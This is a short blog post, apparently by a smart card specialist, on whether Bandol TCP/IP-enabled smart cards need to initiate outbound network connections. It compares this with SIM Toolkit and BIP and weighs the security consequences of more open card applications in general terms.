In the current smart card application models, the card always acts as a server, and it responds to solicitations from the card terminal. This has many advantages: for instance, the terminal can put the card in “sleep” mode when it does not need it.
Some may say that the SIM Toolkit framework is an exception to that rule, but not really. The proactive commands, through which a card application may request operations from the terminal or the network, can only be sent as a response to a command previously sent by the terminal. In SIM Toolkit, the card is not able to take the initiative to send a proactive commands when it is not active.
In Bandol, the situation is different. TCP/IP, unlike ISO7816, is quite symmetrical, and once the card is registered on the network, it is possible for it to initiate a connection, at least in theory. This raises two questions, that I will try to answer: Do we need that? Does that entail security issues?
First, do we need to initiate a transaction. Such an initiation can occur in two ways:
- As a response to an event coming from the outside. This case looks a lot like SIM Toolkit; the card does not really take the initiative, as it simply reacts to an outside event. There is however a major difference: the response is not necessarily targeted to the network node that triggered it.
- As a response to an internal event, usually a timer expiration. This does not look very applicable, because there is no real-time clock on the card. It may however happen as a late response to another event.
The main difference with SIM Toolkit is the ability for the card to initiate a connection with another entity. But even that is not all that new. On recent SIM cards, the BIP allows Toolkit applications to (painfully) connect to the outside.
So, what’s new? The main difference comes from the way in which this connection can be established, and how available it will be. And that has an impact on security. Today, Toolkit applications are in most cases developed by the operator or by trusted partners, and there are relatively few such applications.
If cards become more open, which is one objective of Bandol, then the security issue will become the same than with any server: is it posible to convince this servlet to send me critical information? Can I modify the way in which it establishes some connections?
So, finally, the issue is not so much the fact that it is possbile to open connections to the outside, but (1) the ease with which the applications are developed, and (2) the way in which people connect to the card application, since many more people know how to build problematic HTTP queries than ISO7816 commands.
No Comments